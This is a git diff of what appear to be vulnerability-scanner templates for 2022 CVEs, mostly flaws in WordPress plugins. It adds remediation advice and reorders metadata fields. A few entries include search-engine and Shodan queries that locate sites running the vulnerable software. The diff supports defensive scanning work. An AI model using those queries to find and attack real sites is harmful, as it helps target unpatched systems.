http/cves/2022/CVE-2022-37042.yaml | 8 ++-- http/cves/2022/CVE-2022-37153.yaml | 8 ++-- http/cves/2022/CVE-2022-37190.yaml | 6 ++- http/cves/2022/CVE-2022-37191.yaml | 6 ++- http/cves/2022/CVE-2022-37299.yaml | 6 ++- http/cves/2022/CVE-2022-3768.yaml | 8 ++-- http/cves/2022/CVE-2022-3800.yaml | 4 +- http/cves/2022/CVE-2022-38295.yaml | 6 ++- http/cves/2022/CVE-2022-38296.yaml | 6 ++- http/cves/2022/CVE-2022-38463.yaml | 8 ++-- http/cves/2022/CVE-2022-38467.yaml | 8 ++-- http/cves/2022/CVE-2022-38553.yaml | 8 ++-- http/cves/2022/CVE-2022-38637.yaml | 8 ++-- http/cves/2022/CVE-2022-38794.yaml | 4 +- http/cves/2022/CVE-2022-38817.yaml | 6 ++- http/cves/2022/CVE-2022-38870.yaml | 6 ++- http/cves/2022/CVE-2022-3908.yaml | 8 ++-- http/cves/2022/CVE-2022-39195.yaml | 8 ++-- http/cves/2022/CVE-2022-3933.yaml | 8 ++-- http/cves/2022/CVE-2022-3934.yaml | 8 ++-- http/cves/2022/CVE-2022-3980.yaml | 10 ++-- http/cves/2022/CVE-2022-3982.yaml | 8 ++-- http/cves/2022/CVE-2022-39952.yaml | 8 ++-- http/cves/2022/CVE-2022-39960.yaml | 10 ++-- http/cves/2022/CVE-2022-39986.yaml | 8 ++-- http/cves/2022/CVE-2022-40022.yaml | 8 ++-- http/cves/2022/CVE-2022-40083.yaml | 4 +- http/cves/2022/CVE-2022-40127.yaml | 8 ++-- http/cves/2022/CVE-2022-40359.yaml | 6 ++- http/cves/2022/CVE-2022-4050.yaml | 8 ++-- http/cves/2022/CVE-2022-4057.yaml | 10 ++-- http/cves/2022/CVE-2022-4060.yaml | 8 ++-- http/cves/2022/CVE-2022-4063.yaml | 8 ++-- http/cves/2022/CVE-2022-40684.yaml | 4 +- http/cves/2022/CVE-2022-40734.yaml | 8 ++-- http/cves/2022/CVE-2022-40843.yaml | 4 +- http/cves/2022/CVE-2022-40879.yaml | 8 ++-- http/cves/2022/CVE-2022-40881.yaml | 8 ++-- http/cves/2022/CVE-2022-4117.yaml | 8 ++-- http/cves/2022/CVE-2022-4140.yaml | 8 ++-- http/cves/2022/CVE-2022-41441.yaml | 8 ++-- http/cves/2022/CVE-2022-41473.yaml | 8 ++-- http/cves/2022/CVE-2022-41840.yaml | 8 ++-- http/cves/2022/CVE-2022-42094.yaml | 6 ++- http/cves/2022/CVE-2022-42095.yaml | 6 ++- http/cves/2022/CVE-2022-42096.yaml | 6 ++- http/cves/2022/CVE-2022-42233.yaml | 10 ++-- http/cves/2022/CVE-2022-4260.yaml | 8 ++-- http/cves/2022/CVE-2022-42746.yaml | 8 ++-- http/cves/2022/CVE-2022-42747.yaml | 8 ++-- http/cves/2022/CVE-2022-42748.yaml | 8 ++-- http/cves/2022/CVE-2022-42749.yaml | 8 ++-- http/cves/2022/CVE-2022-4295.yaml | 10 ++-- http/cves/2022/CVE-2022-4301.yaml | 8 ++-- http/cves/2022/CVE-2022-43014.yaml | 8 ++-- http/cves/2022/CVE-2022-43015.yaml | 8 ++-- http/cves/2022/CVE-2022-43016.yaml | 8 ++-- http/cves/2022/CVE-2022-43017.yaml | 8 ++-- http/cves/2022/CVE-2022-43018.yaml | 8 ++-- http/cves/2022/CVE-2022-4306.yaml | 8 ++-- http/cves/2022/CVE-2022-43140.yaml | 10 ++-- http/cves/2022/CVE-2022-43164.yaml | 6 ++- http/cves/2022/CVE-2022-43165.yaml | 8 ++-- http/cves/2022/CVE-2022-43166.yaml | 6 ++- http/cves/2022/CVE-2022-43167.yaml | 6 ++- http/cves/2022/CVE-2022-43169.yaml | 6 ++- http/cves/2022/CVE-2022-43170.yaml | 6 ++- http/cves/2022/CVE-2022-43185.yaml | 6 ++- http/cves/2022/CVE-2022-4320.yaml | 8 ++-- http/cves/2022/CVE-2022-4321.yaml | 8 ++-- http/cves/2022/CVE-2022-4325.yaml | 8 ++-- http/cves/2022/CVE-2022-4328.yaml | 8 ++-- http/cves/2022/CVE-2022-43769.yaml | 8 ++-- http/cves/2022/CVE-2022-4447.yaml | 8 ++-- http/cves/2022/CVE-2022-44877.yaml | 8 ++-- http/cves/2022/CVE-2022-44944.yaml | 8 ++-- http/cves/2022/CVE-2022-44946.yaml | 8 ++-- http/cves/2022/CVE-2022-44947.yaml | 8 ++-- http/cves/2022/CVE-2022-44948.yaml | 6 ++- http/cves/2022/CVE-2022-44949.yaml | 6 ++- http/cves/2022/CVE-2022-44950.yaml | 6 ++- http/cves/2022/CVE-2022-44951.yaml | 6 ++- http/cves/2022/CVE-2022-44952.yaml | 6 ++- http/cves/2022/CVE-2022-45037.yaml | 6 ++- http/cves/2022/CVE-2022-45038.yaml | 6 ++- http/cves/2022/CVE-2022-45354.yaml | 4 +- http/cves/2022/CVE-2022-45362.yaml | 4 +- http/cves/2022/CVE-2022-45805.yaml | 4 +- http/cves/2022/CVE-2022-45835.yaml | 4 +- http/cves/2022/CVE-2022-45917.yaml | 8 ++-- http/cves/2022/CVE-2022-45933.yaml | 8 ++-- http/cves/2022/CVE-2022-46020.yaml | 6 ++- http/cves/2022/CVE-2022-46071.yaml | 6 ++- http/cves/2022/CVE-2022-46073.yaml | 6 ++- http/cves/2022/CVE-2022-46169.yaml | 8 ++-- http/cves/2022/CVE-2022-46381.yaml | 8 ++-- http/cves/2022/CVE-2022-46443.yaml | 6 ++- http/cves/2022/CVE-2022-46463.yaml | 8 ++-- http/cves/2022/CVE-2022-46888.yaml | 8 ++-- http/cves/2022/CVE-2022-46934.yaml | 8 ++-- http/cves/2022/CVE-2022-47002.yaml | 8 ++-- http/cves/2022/CVE-2022-47003.yaml | 8 ++-- http/cves/2022/CVE-2022-47615.yaml | 10 ++-- http/cves/2022/CVE-2022-47945.yaml | 10 ++-- http/cves/2022/CVE-2022-47966.yaml | 8 ++-- http/cves/2022/CVE-2022-47986.yaml | 8 ++-- http/cves/2022/CVE-2022-48012.yaml | 8 ++-- http/cves/2022/CVE-2022-48165.yaml | 8 ++-- http/cves/2022/CVE-2022-4897.yaml | 8 ++-- http/cves/2023/CVE-2023-32117 2.yaml | 46 +++++++++++++++++++ http/cves/2023/CVE-2023-32117.yaml | 2 +- http/cves/2023/CVE-2023-34192.yaml | 2 +- ...-2023-36346.yaml => CVE-2023-36346 2.yaml} | 0 http/cves/2023/CVE-2023-37580.yaml | 2 +- 434 files changed, 1928 insertions(+), 1156 deletions(-) create mode 100644 http/cves/2023/CVE-2023-32117 2.yaml rename http/cves/2023/{CVE-2023-36346.yaml => CVE-2023-36346 2.yaml} (100%) diff --git a/http/cves/2022/CVE-2022-0140.yaml b/http/cves/2022/CVE-2022-0140.yaml index 613d03ecbe..655226b815 100644 --- a/http/cves/2022/CVE-2022-0140.yaml +++ b/http/cves/2022/CVE-2022-0140.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Visual Form Builder plugin before 3.0.8 contains a cross-site scripting vulnerability. The plugin does not perform access control on entry form export, allowing an unauthenticated user to export the form entries as CSV files using the vfb-export endpoint. + remediation: | + Update to the latest version of the WordPress Visual Form Builder plugin (3.0.8) or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/9fa2b3b6-2fe3-40f0-8f71-371dd58fe336 - https://www.fortiguard.com/zeroday/FG-VD-21-082 @@ -16,13 +18,13 @@ info: cve-id: CVE-2022-0140 cwe-id: CWE-306 epss-score: 0.01084 - cpe: cpe:2.3:a:vfbpro:visual_form_builder:*:*:*:*:*:wordpress:*:* epss-percentile: 0.82506 + cpe: cpe:2.3:a:vfbpro:visual_form_builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: vfbpro product: visual_form_builder + framework: wordpress tags: wpscan,cve,cve2022,xss,wordpress http: diff --git a/http/cves/2022/CVE-2022-0147.yaml b/http/cves/2022/CVE-2022-0147.yaml index 590bde1121..6b251edaf7 100644 --- a/http/cves/2022/CVE-2022-0147.yaml +++ b/http/cves/2022/CVE-2022-0147.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Cookie Information/Free GDPR Consent Solution plugin prior to 2.0.8 contains a cross-site scripting vulnerability via the admin dashboard. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress Cookie Information/Free GDPR Consent Solution plugin (2.0.8 or higher) to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/2c735365-69c0-4652-b48e-c4a192dfe0d1 - https://wordpress.org/plugins/wp-gdpr-compliance/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-0147 cwe-id: CWE-79 epss-score: 0.00133 - cpe: cpe:2.3:a:cookieinformation:wp-gdpr-compliance:*:*:*:*:*:wordpress:*:* epss-percentile: 0.47722 + cpe: cpe:2.3:a:cookieinformation:wp-gdpr-compliance:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: cookieinformation product: wp-gdpr-compliance + framework: wordpress tags: cve2022,wordpress,xss,wp,authenticated,cve,wp-plugin,wp-gdpr-compliance,wpscan http: diff --git a/http/cves/2022/CVE-2022-0148.yaml b/http/cves/2022/CVE-2022-0148.yaml index 6cf5cc2cf9..4f6a267a8b 100644 --- a/http/cves/2022/CVE-2022-0148.yaml +++ b/http/cves/2022/CVE-2022-0148.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDK severity: medium description: WordPress All-in-one Floating Contact Form, Call, Chat, and 50+ Social Icon Tabs plugin before 2.0.4 contains a reflected cross-site scripting vulnerability on the my-sticky-elements-leads admin page. + remediation: | + Update the WordPress All-in-one Floating Contact Form plugin to version 2.0.4 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/37665ee1-c57f-4445-9596-df4f7d72c8cd - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0148 @@ -16,13 +18,13 @@ info: cve-id: CVE-2022-0148 cwe-id: CWE-79 epss-score: 0.00165 - cpe: cpe:2.3:a:premio:mystickyelements:*:*:*:*:*:wordpress:*:* epss-percentile: 0.52528 + cpe: cpe:2.3:a:premio:mystickyelements:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: premio product: mystickyelements + framework: wordpress tags: xss,wp-plugin,authenticated,wpscan,cve,cve2022,wordpress http: diff --git a/http/cves/2022/CVE-2022-0149.yaml b/http/cves/2022/CVE-2022-0149.yaml index 2644f9dd69..baddf9d36f 100644 --- a/http/cves/2022/CVE-2022-0149.yaml +++ b/http/cves/2022/CVE-2022-0149.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: The plugin was affected by a reflected cross-site scripting vulnerability in the woo_ce admin page. + remediation: | + Update to the latest version of the WooCommerce Stored Exporter WordPress Plugin (2.7.1) or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/e47c288a-2ea3-4926-93cc-113867cbc77c - https://nvd.nist.gov/vuln/detail/CVE-2022-0149 @@ -15,13 +17,13 @@ info: cve-id: CVE-2022-0149 cwe-id: CWE-79 epss-score: 0.00115 - cpe: cpe:2.3:a:visser:store_exporter_for_woocommerce:*:*:*:*:*:wordpress:*:* epss-percentile: 0.44376 + cpe: cpe:2.3:a:visser:store_exporter_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: visser product: store_exporter_for_woocommerce + framework: wordpress tags: wpscan,cve,cve2022,wordpress,wp-plugin,xss,woocommerce,authenticated http: diff --git a/http/cves/2022/CVE-2022-0150.yaml b/http/cves/2022/CVE-2022-0150.yaml index 29a1261060..9127f5726f 100644 --- a/http/cves/2022/CVE-2022-0150.yaml +++ b/http/cves/2022/CVE-2022-0150.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Accessibility Helper plugin before 0.6.0.7 contains a cross-site scripting vulnerability. It does not sanitize and escape the wahi parameter before outputting back its base64 decode value in the page. + remediation: | + Update to WordPress Accessibility Helper version 0.6.0.7 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/7142a538-7c3d-4dd0-bd2c-cbd2efaf53c5 - https://plugins.trac.wordpress.org/changeset/2661008 @@ -15,13 +17,13 @@ info: cve-id: CVE-2022-0150 cwe-id: CWE-79 epss-score: 0.00133 - cpe: cpe:2.3:a:wp_accessibility_helper_project:wp_accessibility_helper:*:*:*:*:*:wordpress:*:* epss-percentile: 0.47722 + cpe: cpe:2.3:a:wp_accessibility_helper_project:wp_accessibility_helper:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: wp_accessibility_helper_project product: wp_accessibility_helper + framework: wordpress tags: wordpress,wp-plugin,wp,wpscan,cve,cve2022,xss http: diff --git a/http/cves/2022/CVE-2022-0165.yaml b/http/cves/2022/CVE-2022-0165.yaml index 46573fe1d7..7e67e03d78 100644 --- a/http/cves/2022/CVE-2022-0165.yaml +++ b/http/cves/2022/CVE-2022-0165.yaml @@ -5,6 +5,8 @@ info: author: akincibor severity: medium description: WordPress Page Builder KingComposer 2.9.6 and prior does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action (which is available to both unauthenticated and authenticated users). + remediation: | + Update to the latest version of KingComposer (>=2.9.7) to fix the open redirect vulnerability. reference: - https://wpscan.com/vulnerability/906d0c31-370e-46b4-af1f-e52fbddd00cb - https://nvd.nist.gov/vuln/detail/CVE-2022-0165 @@ -14,13 +16,13 @@ info: cve-id: CVE-2022-0165 cwe-id: CWE-601 epss-score: 0.00133 - cpe: cpe:2.3:a:king-theme:kingcomposer:*:*:*:*:*:wordpress:*:* epss-percentile: 0.47728 + cpe: cpe:2.3:a:king-theme:kingcomposer:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: king-theme product: kingcomposer + framework: wordpress tags: cve,cve2022,wp-plugin,redirect,wordpress,wp,wpscan http: diff --git a/http/cves/2022/CVE-2022-0169.yaml b/http/cves/2022/CVE-2022-0169.yaml index 431511996c..ebbe09c335 100644 --- a/http/cves/2022/CVE-2022-0169.yaml +++ b/http/cves/2022/CVE-2022-0169.yaml @@ -6,27 +6,27 @@ info: severity: critical description: | The Photo Gallery by 10Web WordPress plugin before 1.6.0 does not validate and escape the bwg_tag_id_bwg_thumbnails_0 parameter before using it in a SQL statement via the bwg_frontend_data AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL injection + remediation: This is resolved in release 1.6.0. reference: - https://wpscan.com/vulnerability/0b4d870f-eab8-4544-91f8-9c5f0538709c - https://wordpress.org/plugins/photo-gallery/advanced/ - https://nvd.nist.gov/vuln/detail/CVE-2022-0169 - https://plugins.trac.wordpress.org/changeset/2672822/photo-gallery#file9 - remediation: This is resolved in release 1.6.0. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-0169 cwe-id: CWE-89 epss-score: 0.01109 - cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:* epss-percentile: 0.82695 + cpe: cpe:2.3:a:10web:photo_gallery:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - publicwww-query: "/wp-content/plugins/photo-gallery" - framework: wordpress + max-request: 1 vendor: 10web product: photo_gallery + framework: wordpress + publicwww-query: "/wp-content/plugins/photo-gallery" tags: wpscan,cve,cve2022,wp,wp-plugin,wordpress,sqli,photo-gallery variables: num: "999999999" diff --git a/http/cves/2022/CVE-2022-0189.yaml b/http/cves/2022/CVE-2022-0189.yaml index 02fb94a313..bc46b2f168 100644 --- a/http/cves/2022/CVE-2022-0189.yaml +++ b/http/cves/2022/CVE-2022-0189.yaml @@ -5,6 +5,8 @@ info: author: DhiyaneshDK severity: medium description: WordPress RSS Aggregator < 4.20 is susceptible to cross-site scripting. The plugin does not sanitize and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it back in the response, leading to reflected cross-site scripting. + remediation: | + Update WordPress RSS Aggregator plugin to version 4.20 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/52a71bf1-b8bc-479e-b741-eb8fb9685014 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0189 @@ -15,13 +17,13 @@ info: cve-id: CVE-2022-0189 cwe-id: CWE-79 epss-score: 0.00133 - cpe: cpe:2.3:a:wprssaggregator:wp_rss_aggregator:*:*:*:*:*:wordpress:*:* epss-percentile: 0.47722 + cpe: cpe:2.3:a:wprssaggregator:wp_rss_aggregator:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: wprssaggregator product: wp_rss_aggregator + framework: wordpress tags: wpscan,cve,cve2022,wordpress,xss,wp-plugin,authenticated http: diff --git a/http/cves/2022/CVE-2022-0201.yaml b/http/cves/2022/CVE-2022-0201.yaml index fc44769404..b498c6d3b8 100644 --- a/http/cves/2022/CVE-2022-0201.yaml +++ b/http/cves/2022/CVE-2022-0201.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Permalink Manager Lite and Pro plugins before 2.2.15 contain a reflected cross-site scripting vulnerability. They do not sanitize and escape query parameters before outputting them back in the debug page. + remediation: | + Update to WordPress Permalink Manager version 2.2.15 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/f274b0d8-74bf-43de-9051-29ce36d78ad4 - https://plugins.trac.wordpress.org/changeset/2656512 @@ -15,13 +17,13 @@ info: cve-id: CVE-2022-0201 cwe-id: CWE-79 epss-score: 0.00115 - cpe: cpe:2.3:a:permalink_manager_lite_project:permalink_manager_lite:*:*:*:*:*:wordpress:*:* epss-percentile: 0.44376 + cpe: cpe:2.3:a:permalink_manager_lite_project:permalink_manager_lite:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: permalink_manager_lite_project product: permalink_manager_lite + framework: wordpress tags: wp-plugin,wpscan,cve,cve2022,xss,wordpress http: diff --git a/http/cves/2022/CVE-2022-0206.yaml b/http/cves/2022/CVE-2022-0206.yaml index aec7e74080..5f96ef9dd5 100644 --- a/http/cves/2022/CVE-2022-0206.yaml +++ b/http/cves/2022/CVE-2022-0206.yaml @@ -6,25 +6,25 @@ info: severity: medium description: | WordPress NewStatPress plugin before 1.3.6 is susceptible to cross-site scripting. The plugin does not properly escape the whatX parameters before outputting them back in attributes. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: Fixed in version 1.3.6. reference: - https://wpscan.com/vulnerability/ce12437a-d440-4c4a-9247-95a8f39d00b9 - https://wordpress.org/plugins/newstatpress - https://nvd.nist.gov/vuln/detail/CVE-2022-0206 - remediation: Fixed in version 1.3.6. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-0206 cwe-id: CWE-79 epss-score: 0.00122 - cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* epss-percentile: 0.45705 + cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: newstatpress_project product: newstatpress + framework: wordpress tags: xss,wp,authenticated,cve2022,wordpress,wp-plugin,newstatpress,wpscan,cve http: diff --git a/http/cves/2022/CVE-2022-0208.yaml b/http/cves/2022/CVE-2022-0208.yaml index e4aa5e4299..7cdc2ce04f 100644 --- a/http/cves/2022/CVE-2022-0208.yaml +++ b/http/cves/2022/CVE-2022-0208.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Plugin MapPress before version 2.73.4 does not sanitize and escape the 'mapid' parameter before outputting it back in the "Bad mapid" error message, leading to reflected cross-site scripting. + remediation: | + Update to the latest version of MapPress (2.73.4 or higher) or apply the vendor-provided patch to fix the XSS vulnerability. reference: - https://wpscan.com/vulnerability/59a2abd0-4aee-47aa-ad3a-865f624fa0fc - https://nvd.nist.gov/vuln/detail/CVE-2022-0208 @@ -15,13 +17,13 @@ info: cve-id: CVE-2022-0208 cwe-id: CWE-79 epss-score: 0.00122 - cpe: cpe:2.3:a:mappresspro:mappress:*:*:*:*:*:wordpress:*:* epss-percentile: 0.45705 + cpe: cpe:2.3:a:mappresspro:mappress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: mappresspro product: mappress + framework: wordpress tags: cve2022,mappress,xss,wordpress,wp-plugin,wpscan,cve http: diff --git a/http/cves/2022/CVE-2022-0212.yaml b/http/cves/2022/CVE-2022-0212.yaml index c3b62c3fef..2a2255bd12 100644 --- a/http/cves/2022/CVE-2022-0212.yaml +++ b/http/cves/2022/CVE-2022-0212.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WorsPress Spider Calendar plugin through 1.5.65 is susceptible to cross-site scripting. The plugin does not sanitize and escape the callback parameter before outputting it back in the page via the window AJAX action, available to both unauthenticated and authenticated users. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of WordPress Spider Calendar plugin (>=1.5.66) or apply the vendor-supplied patch to fix the XSS vulnerability. reference: - https://wpscan.com/vulnerability/15be2d2b-baa3-4845-82cf-3c351c695b47 - https://wordpress.org/plugins/spider-event-calendar/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2022-0212 cwe-id: CWE-79 epss-score: 0.00099 - cpe: cpe:2.3:a:10web:spidercalendar:*:*:*:*:*:wordpress:*:* epss-percentile: 0.40308 + cpe: cpe:2.3:a:10web:spidercalendar:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: 10web product: spidercalendar + framework: wordpress tags: cve,cve2022,xss,wpscan,wordpress,wp-plugin,wp,spider-event-calendar,unauthenticated http: diff --git a/http/cves/2022/CVE-2022-0218.yaml b/http/cves/2022/CVE-2022-0218.yaml index f26b521e2b..fd64c0d284 100644 --- a/http/cves/2022/CVE-2022-0218.yaml +++ b/http/cves/2022/CVE-2022-0218.yaml @@ -5,6 +5,8 @@ info: author: hexcat severity: medium description: WordPress Email Template Designer WP HTML Mail allows stored cross-site scripting through an unprotected REST-API endpoint. + remediation: | + Update to version 3.1 or later of the HTML Email Template Designer plugin to fix the vulnerability. reference: - https://www.wordfence.com/blog/2022/01/unauthenticated-xss-vulnerability-patched-in-html-email-template-designer-plugin/ - https://wordpress.org/plugins/wp-html-mail/ @@ -16,13 +18,13 @@ info: cve-id: CVE-2022-0218 cwe-id: CWE-79 epss-score: 0.03872 - cpe: cpe:2.3:a:codemiq:wordpress_email_template_designer:*:*:*:*:*:wordpress:*:* epss-percentile: 0.90766 + cpe: cpe:2.3:a:codemiq:wordpress_email_template_designer:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: codemiq product: wordpress_email_template_designer + framework: wordpress tags: wordpress,wp-plugin,xss,cve,cve2022 http: diff --git a/http/cves/2022/CVE-2022-0220.yaml b/http/cves/2022/CVE-2022-0220.yaml index b01046aad1..e60e7817f2 100644 --- a/http/cves/2022/CVE-2022-0220.yaml +++ b/http/cves/2022/CVE-2022-0220.yaml @@ -6,23 +6,23 @@ info: severity: medium description: | WordPress GDPR & CCPA plugin before 1.9.27 contains a cross-site scripting vulnerability. The check_privacy_settings AJAX action, available to both unauthenticated and authenticated users, responds with JSON data without an "application/json" content-type, and JavaScript code may be executed on a victim's browser. + remediation: Version 1.9.26 has added a CSRF check. This vulnerability is only exploitable against unauthenticated users. reference: - https://wpscan.com/vulnerability/a91a01b9-7e36-4280-bc50-f6cff3e66059 - https://nvd.nist.gov/vuln/detail/CVE-2022-0220 - remediation: Version 1.9.26 has added a CSRF check. This vulnerability is only exploitable against unauthenticated users. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-0220 cwe-id: CWE-116 epss-score: 0.00124 - cpe: cpe:2.3:a:welaunch:wordpress_gdpr\&ccpa:*:*:*:*:*:wordpress:*:* epss-percentile: 0.46073 + cpe: cpe:2.3:a:welaunch:wordpress_gdpr\&ccpa:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: welaunch product: wordpress_gdpr\&ccpa + framework: wordpress tags: wpscan,cve,cve2022,wordpress,wp-plugin,wp,xss,unauth http: diff --git a/http/cves/2022/CVE-2022-0234.yaml b/http/cves/2022/CVE-2022-0234.yaml index f38f4886d5..dd7ca01825 100644 --- a/http/cves/2022/CVE-2022-0234.yaml +++ b/http/cves/2022/CVE-2022-0234.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress WOOCS plugin before 1.3.7.5 is susceptible to cross-site scripting. The plugin does not sanitize and escape the woocs_in_order_currency parameter of the woocs_get_products_price_html AJAX action, available to both unauthenticated and authenticated users, before outputting it back in the response. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update the WordPress WOOCS plugin to version 1.3.7.5 or later to mitigate the XSS vulnerability. reference: - https://wpscan.com/vulnerability/fd568a1f-bd51-41bb-960d-f8573b84527b - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0234 @@ -17,15 +19,15 @@ info: cve-id: CVE-2022-0234 cwe-id: CWE-79 epss-score: 0.00133 - cpe: cpe:2.3:a:pluginus:woocs:*:*:*:*:*:wordpress:*:* epss-percentile: 0.47722 + cpe: cpe:2.3:a:pluginus:woocs:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - google-query: inurl:"wp-content/plugins/woocommerce-currency-switcher" verified: true - framework: wordpress + max-request: 1 vendor: pluginus product: woocs + framework: wordpress + google-query: inurl:"wp-content/plugins/woocommerce-currency-switcher" tags: wpscan,cve,cve2022,wordpress,wp-plugin,wp,xss,woocs http: diff --git a/http/cves/2022/CVE-2022-0271.yaml b/http/cves/2022/CVE-2022-0271.yaml index f8ccfdcc37..a91f6d4685 100644 --- a/http/cves/2022/CVE-2022-0271.yaml +++ b/http/cves/2022/CVE-2022-0271.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress LearnPress plugin before 4.1.6 contains a cross-site scripting vulnerability. It does not sanitize and escape the lp-dismiss-notice before outputting it back via the lp_background_single_email AJAX action. + remediation: | + Upgrade LearnPress to version 4.1.6 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/ad07d9cd-8a75-4f7c-bbbe-3b6b89b699f2 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0271 @@ -16,13 +18,13 @@ info: cve-id: CVE-2022-0271 cwe-id: CWE-79 epss-score: 0.00119 - cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* epss-percentile: 0.45304 + cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: thimpress product: learnpress + framework: wordpress tags: wp,wp-plugin,wordpress,cve,cve2022,learnpress,wpscan,xss http: diff --git a/http/cves/2022/CVE-2022-0281.yaml b/http/cves/2022/CVE-2022-0281.yaml index 69cb9bf825..cdc399aafb 100644 --- a/http/cves/2022/CVE-2022-0281.yaml +++ b/http/cves/2022/CVE-2022-0281.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11. + remediation: | + Apply the latest security patch or update provided by the Microweber CMS vendor to fix the information disclosure vulnerability (CVE-2022-0281). reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-0281 - https://github.com/microweber/microweber/commit/e680e134a4215c979bfd2eaf58336be34c8fc6e6 @@ -15,13 +17,13 @@ info: cve-id: CVE-2022-0281 cwe-id: CWE-200 epss-score: 0.00492 - cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* epss-percentile: 0.7314 + cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.favicon.hash:780351152 vendor: microweber product: microweber + shodan-query: http.favicon.hash:780351152 tags: cve,cve2022,microweber,disclosure,huntr http: diff --git a/http/cves/2022/CVE-2022-0288.yaml b/http/cves/2022/CVE-2022-0288.yaml index e3b1fcd814..59ccc4121a 100644 --- a/http/cves/2022/CVE-2022-0288.yaml +++ b/http/cves/2022/CVE-2022-0288.yaml @@ -6,23 +6,23 @@ info: severity: medium description: | WordPress Ad Inserter plugin before 2.7.10 contains a cross-site scripting vulnerability. It does not sanitize and escape the html_element_selection parameter before outputting it back in the page. + remediation: Fixed in version 2.7.12 reference: - https://wpscan.com/vulnerability/27b64412-33a4-462c-bc45-f81697e4fe42 - https://nvd.nist.gov/vuln/detail/CVE-2022-0288 - remediation: Fixed in version 2.7.12 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-0288 cwe-id: CWE-79 epss-score: 0.00141 - cpe: cpe:2.3:a:ad_inserter_pro_project:ad_inserter_pro:*:*:*:*:*:wordpress:*:* epss-percentile: 0.49173 + cpe: cpe:2.3:a:ad_inserter_pro_project:ad_inserter_pro:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: ad_inserter_pro_project product: ad_inserter_pro + framework: wordpress tags: wordpress,xss,wpscan,cve,cve2022 http: diff --git 